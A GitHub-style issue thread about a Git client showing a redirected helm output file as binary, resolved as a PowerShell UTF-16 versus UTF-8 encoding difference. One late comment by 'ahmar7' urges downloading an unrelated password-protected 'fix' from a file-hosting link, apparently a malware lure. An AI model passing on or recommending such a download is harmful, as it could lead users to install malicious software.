### ISSUE TITLE
Directed file from output is not showing in text panel

### ISSUE THREAD

**Issue by eliyyov** [ForkIssues/TrackerWin#2307]
Directed file from output is not showing in text panel

> `helm show values prometheus-community/kube-prometheus-stack > kube-prometheus-stack-values.yaml`

![image](https://github.com/user-attachments/assets/0d0e645b-fdf2-40a5-8494-c07411196554)

**Comment by DanPristupov** [comment]
Does git show it?
Run in the command line: `git show <SHA> prometheus/staging/kube-prometheus-stack-values.yaml`?

**Comment by eliyyov** [comment]
This is the output

![image](https://github.com/user-attachments/assets/5216d045-1aa2-48f8-9ab6-48e288712f9a)

**Comment by DanPristupov** [comment]
As you see, git says that the file has a binary content and doesn't print the text.

**Comment by eliyyov** [comment]
Ah okay, i got the problem because i use powershell terminal from vscode
Once i tried it in git bash, it appear as text

Thanks

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by DanPristupov** [comment]
Most likely powershell saved output as utf16 encoding and bash did as utf8. Nowadays we should use utf8 everywhere.
